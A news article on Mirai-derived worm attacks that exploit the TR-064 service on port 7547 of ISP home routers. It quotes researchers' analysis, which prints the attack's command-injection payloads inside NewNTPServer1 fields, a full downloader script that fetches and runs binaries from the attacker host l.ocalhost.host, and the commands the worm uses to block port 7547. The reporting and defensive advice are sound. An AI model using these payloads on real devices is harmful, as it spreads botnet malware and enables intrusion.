Newly discovered router flaw being hammered by in-the-wild attacks

Dan Goodin

Online criminals—at least some of them wielding the notorious Mirai malware that transforms Internet-of-things devices into powerful denial-of-service cannons—have begun exploiting a critical flaw that may be present in millions of home routers.

Routers provided to German and Irish ISP customers for Deutsche Telekom and Eircom, respectively, have already been identified as being vulnerable, according to recently published reports from researchers tracking the attacks. The attacks exploit weaknesses found in routers made by Zyxel, Speedport, and possibly other manufacturers. The devices leave Internet port 7547 open to outside connections. The exploits use the opening to send commands based on the TR-069 and related TR-064 protocols, which ISPs use to remotely manage large fleets of hardware. According to this advisory published Monday morning by the SANS Internet Storm Center, honeypot servers posing as vulnerable routers are receiving exploits every five to 10 minutes.

SANS Dean of Research Johannes Ullrich said in Monday's post that exploits are almost certainly the cause behind an outage that hit Deutsche Telekom customers over the weekend. In a Facebook update, officials with the German ISP said 900,000 customers are vulnerable to the attacks until they are rebooted and receive an emergency patch. Earlier this month, researchers at security firm BadCyber reported that the same one-two port 7547/TR-064 exploit hit the home router of a reader in Poland. They went on to identify D1000 routers supplied by Eircom as also being susceptible and cited this post as support. The Shodan search engine shows that 41 million devices leave port 7547 open, while about five million expose TR-064 services to the outside world.

The attacks started shortly after researchers published attack code that exploited the exposed TR-064 service. Included as a module for the Metasploit exploitation framework, the attack code opens the port 80 Web interface that enables remote administration. From there, devices that use default or otherwise weak authentication passwords can be remotely commandeered and made to join botnets that carry out Internet-crippling denial-of-service attacks.

BadCyber researchers analyzed one of the malicious payloads that was delivered during the attacks and found it originated from a known Mirai command-and-control server.

"The unusual application of TR-064 commands to execute code on routers has been described for the very first time at the beginning of November, and a few days later a relevant Metasploit module had appeared," BadCyber researchers wrote in a blog post. "It looks like someone decided to weaponize it and create an Internet worm based on Mirai code."

All bases covered

To infect as many routers as possible, the exploits deliver three separate exploit files, two tailored to devices running different types of MIPS chips and a third that targets routers with ARM silicon. Just like the Metasploit code, the malicious payloads use the exploit to open the remote administration interface and then attempt to log in using three different default passwords. The attack then closes port 7547 to prevent other criminal enterprises from taking control of the devices. The researchers wrote:

Logins and passwords are obfuscated (or “encrypted”) in the worm code using the same algorithm as does Mirai. The C&C server resides under timeserver.host domain name, which can be found on the Mirai tracker list. Also the pseudorandom algorithm to scan IPs... looks like [it is] copied from Mirai source code. It looks like the author of the malware borrowed the Mirai code and mixed it with the Metasploit module to produce his worm.

The malware itself is really friendly as it closes the vulnerability once the router is infected. It performs the following command:

busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP
busybox killall -9 telnetd

which should make the device “secure”... until next reboot. The first one closes port 7547 and the second one kills the telnet service, making it really hard for the ISP to update the device remotely.

Today we have seen new attack variants, namely

cd /tmp;wget http://l.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh

<NewNTPServer1>`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`</NewNTPServer1>

<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>

In one of them the download method is changed from wget to tftp, while the other one changes binary download to a script. The script x.sh has the following contents:

#!/bin/sh
# https://www.instagram.com/p/bxI-TSk3p_/
cd /var/tmp
cd /tmp
rm -f *
wget http://l.ocalhost.host/1
busybox chmod a+x 1
chmod 777 1
./1
rm -f *
wget http://l.ocalhost.host/2
busybox chmod a+x 2
chmod 777 2
./2
rm -f *
wget http://l.ocalhost.host/3
busybox chmod a+x 3
chmod 777 3
./3
rm -f *
wget http://l.ocalhost.host/4
busybox chmod a+x 4
chmod 777 4
./4
rm -f *
wget http://l.ocalhost.host/5
busybox chmod a+x 5
chmod 777 5
./5
rm -f *
wget http://l.ocalhost.host/6
busybox chmod a+x 6
chmod 777 6
./6
rm -f *
wget http://l.ocalhost.host/7
busybox chmod a+x 7
chmod 777 7
./7
rm -f *

Looks like the attacker wants some really wide coverage:

1: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
2: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
3: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
4: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
5: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
6: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
7: ELF 32-bit MSB executable, Motorola 68020, version 1 (SYSV), statically linked, stripped

According to researchers at security firm Kaspersky, the command-and-control servers are, interestingly, pointing to IP addresses assigned to the US military.

"Since there is no Mirai related infrastructure behind this network range, the bots will not receive any further commands until the criminals behind this attack will change the DNS records again," Kaspersky researchers wrote in a blog post published around the same time this article went live. "For sure, this is some kind of trolling from the criminals who conducted the attack."

The TR-069 exploit is at least the second major update that Mirai has received since its source code was made public in October. Additional technical details about the vulnerability are available here, here, and here.

People who want to lock down their routers and have the necessary technical skills should reboot them and immediately check to see if the devices are listening for incoming commands on port 7547. As mentioned above, most Mirai-infected devices will be locked down and will display few indications of compromise, although frequent reboots have been reported in a least some cases. Generally speaking, IoT devices are disinfected each time they're restarted. A good practice is to reboot them and immediately lock them down with a strong password, or, better yet, to disable remote administration.